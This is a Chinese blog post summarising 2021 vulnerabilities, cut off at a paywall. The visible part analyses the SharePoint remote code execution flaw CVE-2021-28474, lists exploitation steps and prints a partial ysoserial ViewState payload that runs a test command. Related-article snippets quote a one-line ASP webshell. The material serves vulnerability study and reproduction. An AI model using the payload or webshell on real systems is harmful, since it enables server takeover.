所学漏洞总结

最新推荐文章于 2024-07-10 17:40:25 发布
最新推荐文章于 2024-07-10 17:40:25 发布
阅读量898 收藏 1
点赞数
分类专栏: 漏洞复现 文章标签: 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45540609/article/details/119995708
版权
本文详细分析了2021年影响广泛的安全漏洞,包括MS SharePoint远程代码执行、Linux Netfilter权限提升、Windows PrintNightmare、Windows Print Spooler远程代码执行、Containerd和RUNC容器逃逸、Linux polkit提权以及weblogic反序列化漏洞。这些漏洞都可能造成严重后果,如权限提升、系统被攻击者控制等。文章深入探讨了漏洞的成因、影响范围、利用方式及处置建议,为读者提供了全面的理解和防范措施。
摘要由CSDN通过智能技术生成

一、CVE-2021-28474 MS SharePoint远程代码执行漏洞

1、漏洞简介

漏洞允许通过身份验证的用户在SharePoint web应用程序的服务账户中执行任意.NET代码。想要利用该漏洞,攻击者需要具备SharePoint站点的SPBasePermissions.ManageLists权限。默认情况下,经过身份验证的SharePoint用户可以创建网页页面,并拥有所需的所有权限。

2、漏洞成因

用于安全验证的代码和实际处理用户输入的代码之间不一致。

EditingPageParser.VerifyControlOnSafeList()提供验证,验证输入是否包含不安全控件,也就是验证web.config文件中SafeControl未将任何控件标记为安全。

EditingPageParser.ParseStringInternal()解析用户输入,寄存器中信息填充hashtable,服务器控件标记中的值填充hashtable2。根据web.config中的SafeControl验证hashtable2,如果有没有被标记为安全的控件,就会抛出异常。

SharePoint只验证服务器端控件带有runat=“server”属性的标记

验证通过SharePoint处理标记。

处理时,text4 = HttpUtility.HtmlDecode(text4)属性值有解析器进行HTML解码,但验证时没有相应行。

加入我们runat=“sserver”,EditingPageParser.VerifyControlOnSafeList()函数不会将其视为服务器端控件,也不会检查它的安全性。但是,在处理时,它将被识别为服务器端控件并执行。

3、漏洞影响范围

Microsoft SharePoint Foundation 2013 Service Pack 1

Microsoft SharePoint Server 2019

Microsoft SharePoint Enterprise Server 2016

4、漏洞利用

普通用户创建站点

指向该站点任何站点页面的相对路径

使用自定义可执行文件向易受攻击的服务器发送请求以触发漏洞。需要提供网站地址、凭证和相对路径。

攻击成功会收到web.config的内容,在web.config中获取validationKey和validationAlg="HMACSHA256"

进入攻击目标的SharePoint,打开C:windows emp文件夹,此时文件夹不存在我们上传的文件。

在攻击者主机上打开success.aspx页面,源代码视图找到__VIEWSTATEGENERATOR

用ysoserial生成ViewState的paylolad,将其作为__VIEWSTATE参数发送到目标服务器

http://sp2019/sites/ts01/_layouts/15/success.aspx?__VIEWSTATE=%2FwEy2gcAAQAAAP%2F%2F%2F%2F8BAAAAAAAAAAwCAAAABlN5c3RlbQUBAAAAQFN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLlNvcnRlZFNldGAxW1tTeXN0ZW0uU3RyaW5nLG1zY29ybGliXV0EAAAABUNvdW50CENvbXBhcmVyB1ZlcnNpb24FSXRlbXMAAQABCAgCAAAAAgAAAAkDAAAAAAAAAAkEAAAABAMAAABAU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuQ29tcGFyaXNvbkNvbXBhcmVyYDFbW1N5c3RlbS5TdHJpbmddXQEAAAALX2NvbXBhcmlzb24BCQUAAAARBAAAAAIAAAAGBgAAACsvYyBlY2hvIFJDRSA%2BIGM6L3dpbmRvd3MvdGVtcC9TUF9SQ0VfMDEudHh0BgcAAAADY21kBAUAAAAiU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcgMAAAAIRGVsZWdhdGUAAXgBAQEJCAAAAA0ADQAECAAAADBTeXN0ZW0uRGVsZWdhdGVTZ
最低0.47元/天 解锁文章
玛卡巴卡巴巴亚卡
关注
专栏目录
漏洞近期学习总结(自用)
PurEandPure
05-11 165
攻击者可以通过一些漏洞上传一句话木马到Web服务器上,一旦成功,攻击者就可以通过发送HTTP请求执行一句话木马中的命令来远程操纵受害者服务器。SQL注入的原理是攻击者通过构造恶意的SQL查询语句,以绕过应用程序的验证和过滤机制,从而对目标数据库进行非法操作,例如读取或篡改数据表,或者在数据库中执行任意的SQL命令,甚至获取数据库管理员权限。例如,<%eval request("c")%>,攻击者将代码传递到服务器上的url上,以执行该代码。例如,最常见的一句话木马代码是:<?
一个内核漏洞详解:容器逃逸
flynetcn的专栏
09-01 2260
CVE-2021-22555:一个影响2006年(Linux kernel v2.6.19-rc1 发布)至今(Linux kernel v5.12-rc8)的所有Linux内核版本的漏洞,可导致本地提权与容器逃逸;该漏洞是个内核级漏洞,跟Linux的发行版本没有关系,也就是说只要Linux 内核版本在v2.6.19-rc1 ~v5.12-rc8 之间的内核,都存在被黑客利用该漏洞攻击的可能。 该漏洞是由Andy Nguyen (theflow@)发现,于2021年07月16日发布。换句话说,该漏洞
微软7月补丁星期二修复142个漏洞,含4个0day
最新发布
smellycat000的专栏
07-10 1145
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士微软在7月补丁星期二供修复了142个漏洞,其中2个是已遭利用漏洞,2个是已公开的0day。该补丁日共修复5个严重漏洞,均为远程代码执行漏洞。这些漏洞的类别如下:26个提权漏洞24个安全特性绕过漏洞59个远程代码执行漏洞9个信息泄露漏洞17个拒绝服务漏洞7个欺骗漏洞014个0day漏洞本月补丁星期二修复了2个已遭利用的漏洞和2个公开披露的0day漏...
CVE-2021-22555利用过程翻译
inquisiter
03-30 1221
原文链接:https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html 本文基本属于翻译,原文解释的很清楚,我按自己的理解来记录下。 漏洞位于netfilter。原作者利用此漏洞获得了两万美金的奖励。漏洞比较老,存在将近15年之久,从这个漏洞来看,内核其实类似的漏洞应该还有不少。今年貌似爆出了类似的漏洞 https://github.com/Bonfee/CVE-2022-0995 。今天又看到一个:htt
关于内核堆溢出漏洞的分析
kali_Ma的博客
12-31 2151
一、漏洞背景 CVE-2021-22555是一个存在了15年之久的内核堆溢出漏洞,它位于内核的Netfilter组件中,这个组件可以被用来实现防火墙、NAT等功能。 该漏洞在2006年由commit 9fa492cdc160cd27ce1046cb36f47d3b2b1efa21引入,并在2021年由commit b29c457a6511435960115c0f548c4360d5f4801d修复。 利用这个漏洞可以导致目标系统拒绝服务,甚至实现提权、容器逃逸并执行任意代码,危害等级极高
网站漏洞总结
10-17
### 网站漏洞总结 #### 一、概述 网站安全是互联网技术中非常重要的一环。随着网络技术的发展,各种安全问题层出不穷。本文主要总结了一些常见的网站漏洞,并对其进行了详细的阐述,旨在帮助开发者和运维人员更好...
上传攻击漏洞总结
06-12
综上所述,本文档对上传攻击的原理、攻击流程、检测方法以及攻击框架等方面进行了详细的阐述和分析,旨在为网络安全工作者提供一个全面的参考框架,帮助他们更好地理解和应对文件上传漏洞的威胁。
2024HVV在即| 最新漏洞CVE库(1.5W)与历史漏洞POC总结分享!
记录开发和安全学习过程中的点点滴滴
04-22 1927
也快到护网的时间了,每年的护网都是一场攻防实战的盛宴,那么漏洞库就是攻防红蓝双方人员的弹药库,红队人员可以通过工具进行监测是否存在历史漏洞方便快速打点,而蓝队则可以对资产进行梳理和监测历史漏洞,及时处理和修复,做好准备.
PHP代码执行漏洞总结大全
LJW_IIE的博客
10-11 1万+
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Mar
渗透测试之巧用工具搞定sharepoint
ALLEN'Blog
03-03 616
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。同时每个成长路线对应的板块都有配套的视频提供:当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。
记一次Docker容器失败的逃逸
afei001
08-11 232
在授权渗透中碰到某客户搭建某开源漏洞环境。试试水,没想到这么菜😂!你这菜鸟,要你有何用。
Windows PrintNightmare 漏洞和补丁分析
smellycat000的专栏
07-07 1954
聚焦源代码安全,网罗国内外最新资讯!一、背景CVE-2021-34527是发生在windows打印服务中的漏洞,攻击者可以利用该漏洞使用低权限用户加载恶意DLL,实现远程代码执行。该漏洞...
Windows Print Spooler服务最新漏洞CVE-2021-34527详细分析
热门推荐
爱国小白帽
07-09 1万+
0x00 前言 近日,有安全研究员在github上公开了"CVE-2021-1675"的exp PrintNightmare,后经验证公开的exp是一个与CVE-2021-1675不同的漏洞,微软为其分配了新的编号CVE-2021-34527。这篇文章记录了CVE-2021-34527的复现过程,并对漏洞成因进行了简单的分析。 0x01 漏洞复现 这里记录域控环境下使用普通权限域账户实现RCE反弹nt authority\system shell的过程。下面的漏洞复现和漏洞分析都是基..
Exchange服务器端请求伪造(SSRF)漏洞CVE-2021-26855
qq_42660246的博客
04-26 5925
Exchange服务器端请求伪造(SSRF)漏洞CVE-2021-26855 1.漏洞描述 Exchange Server 是微软公司的一套电子邮件服务组件,是个消息与协作系统。2021年03月3日,微软官方发布了Microsoft Exchange安全更新,披露了多个高危严重漏洞,其中:在 CVE-2021-26855 Exchange SSRF漏洞中,攻击者可直接构造恶意请求,以Exchange server的身份发起任意HTTP请求,扫描内网,并且可获取Exchange用户信息。该漏洞利用无需身份认证
【PoC公开】CVE-2021-27850: Tapestry 序列化漏洞通告
爱国小白帽
06-28 1445
** 赶紧点击上方话题进行订阅吧!** 报告编号:B6-2021-062803 报告来源:360CERT 报告作者:360CERT 更新日期:2021-06-28 1 漏洞简述 2021年06月28日,360CERT监测发现kahla-sec公开了CVE-2021-27850漏洞的利用程序,漏洞编号为CVE-2021-27850,漏洞等级:高危,漏洞评分:7.5。 对此,360CERT建议广大用户及时将``升级到最新版本。与此同时,请做好资产自查以及预防工作,以免遭受黑客攻击。 2 风险等级 360CERT
漏洞情报 | VMware vCenter Server 远程代码执行漏洞(CVE-2021-21985)
爱国小白帽
05-28 5243
点击上方 订阅话题 第一时间了解漏洞威胁 0x01 漏洞描述 VMware vCenter Server是VMware虚拟化管理平台,广泛的应用于企业私有云内网中。通过使用vCenter,管理员可以轻松的管理上百台虚拟化环境 。 2021年5月26日,360漏洞云监测到VMware官网发布安全公告。攻击者使用漏洞(CVE-2021-21985)可构造恶意请求,通过vCenter中默认开启的Virtual SAN Health Check插件造成远程代码执行漏洞。360漏洞云已经成功复现该漏洞。 0x02
漏洞复现】Apache Druid 远程代码执行 CVE-2021-25646
Adminxe的博客
02-03 476
0x00 前言 这个漏洞的根本问题是一个druid中全局性的问题,开发者在使用Jackson相关的标签时,出现疏漏,使得攻击者可以构造传入的json串来控制一些敏感的参数。 阿里云安全@Litch1向Apache官方报告了Apache Druid远程代码执行漏洞 当时 漏洞 已知,处于某些原因,提取的poc也没进行公布,今天醒来,看到很多公众号发 ,也就总结一下,集各家所长,写一个复现的文章。 Apache Druid 是用Java编写的面向列的开源分布式数据存储,旨在快速获取大量事件数据...
网站安全漏洞分析与防护策略
"网站安全漏洞的产生分析、处理总结" 在当前的数字化时代,网站安全成为了企业和个人都必须关注的重要问题。网站安全漏洞的产生往往源于多种因素,包括编程错误、设计缺陷以及人为疏忽。本文主要探讨了由程序员在...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值